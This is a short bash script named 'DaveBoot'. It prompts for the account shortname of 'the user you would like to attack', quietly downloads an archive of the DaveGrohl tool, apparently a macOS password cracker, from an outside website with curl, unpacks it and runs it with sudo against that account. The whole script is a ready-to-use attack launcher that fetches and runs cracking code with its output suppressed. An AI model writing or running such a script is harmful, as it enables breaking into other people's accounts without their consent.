#!/bin/bash

clear
cd ~/Desktop
read -p "Welcome to DaveBoot
What is the shortname for the user you would like to attack? " SHORTNAME
clear
curl -O "http://davegrohl.org/DaveGrohl-2.1.zip" > /dev/null 2>&1 
unzip  Dave* > /dev/null 2>&1 
rm Dave*.zip
rm -r  __MACOSX
clear
cd Dave*
sudo ./Dave -u "$SHORTNAME"